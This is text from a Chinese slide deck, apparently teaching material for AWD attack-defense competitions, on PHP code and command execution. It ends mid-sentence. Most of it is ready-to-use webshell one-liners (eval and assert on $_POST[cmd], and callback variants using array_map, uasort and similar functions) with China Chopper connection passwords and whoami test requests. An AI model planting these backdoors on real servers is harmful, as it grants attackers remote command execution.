2.3、AWD安全攻防赛制PHP命令执行.pptxVIP

AWD中PHP命令/代码执行;01;PHP命令执行;常见php恶意函数 eval()，assert(), system()， preg_replace(), create_function, call_user_func, call_user_func_array，array_map()， 反引号``，ob_start()， exec()，shell_exec()，passthru()， escapeshellcmd()，popen()，proc_open()，pcntl_exec();PHP命令执行;PHP命令执行;代码执行举例 1、eval()函数 #传入的参数必须为PHP代码，既需要以分号结尾。 #命令执行：cmd=system(whoami); #菜刀连接密码：cmd ?php @eval($_POST[cmd]);? 2、assert()函数 #assert函数是直接将传入的参数当成PHP代码直接，不需要以分???结尾，当然你加上也可以。 #命令执行：cmd=system(whoami) #菜刀连接密码：cmd ?php @assert($_POST[cmd])? ;代码执行举例 3、create_function()函数 #创建匿名函数执行代码 #执行命令和上传文件参考eval函数(必须加分号)。 #菜刀连接密码：cmd $func =create_function(,$_POST[cmd’]); $func(); 4、 call_user_func()函数 #传入的参数作为assert函数的参数 #cmd=system(whoami) #菜刀连接密码：cmd call_user_func(assert,$_POST[cmd]); ;代码执行举例 5、array_map ()函数 #array_map() 函数将用户自定义函数作用到数组中的每个值上，并返回用户自定义函数作用后的带有新值的数组。 #命令执行http://localhost/123.php?func=systemcmd=whoami #菜刀连接http://localhost/123.php?func=assert?? 密码：cmd $func=$_GET[func’]; $cmd=$_POST[cmd’]; $array[0]=$cmd; $new_array=array_map($func,$array); echo $new_array; ;代码执行举例 6、call_user_func_array()函数 #将传入的参数作为数组的第一个值传递给assert函数 #cmd=system(whoami) #菜刀连接密码：cmd $cmd=$_POST[cmd’]; $array[0]=$cmd; call_user_func_array(assert,$array); 7、array_filter ()函数 #用回调函数过滤数组中的元素：array_filter(数组,函数) #命令执行func=systemcmd=whoami #菜刀连接http://localhost/123.php?func=assert?密码cmd $cmd=$_POST[cmd’]; $array1=array($cmd); $func =$_GET[func’]; array_filter($array1,$func); ;代码执行举例 8、uasort()函数 #php环境=5.6才能用 #uasort() 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联 。 #命令执行： http://localhost/123.php?1=1+12=eval($_GET[cmd])cmd=system(whoami); #菜刀连接： http://localhost/123.php?1=1+12=eval($_POST[cmd])?? 密码：cmd usort($_GET,asse.rt); ;代码执行举例 9、preg_replace()函数 正则表达式中的/e模式的作用是将替换串中的内容当作代码来执行 PHP 5.5.0 起， 传入 “\e” 修饰符的时候，会产生一个 E_DEPRECATED 错误； PHP 7.0.0 起，会产生 E_WARNING 错误，同时 “\e” 也无法起效。 所以正是这个修饰符，让我们可以进行命令注入 7.0.0 不再支持 /e修饰符。 请用 preg_replace_callback() 代替。 5.5.0 /e 修饰符已经被弃用了。使用 preg_replace_callback() 代替。参见文档中 PREG_REPLACE_EVAL 关于安全风险的更多信息。 在实践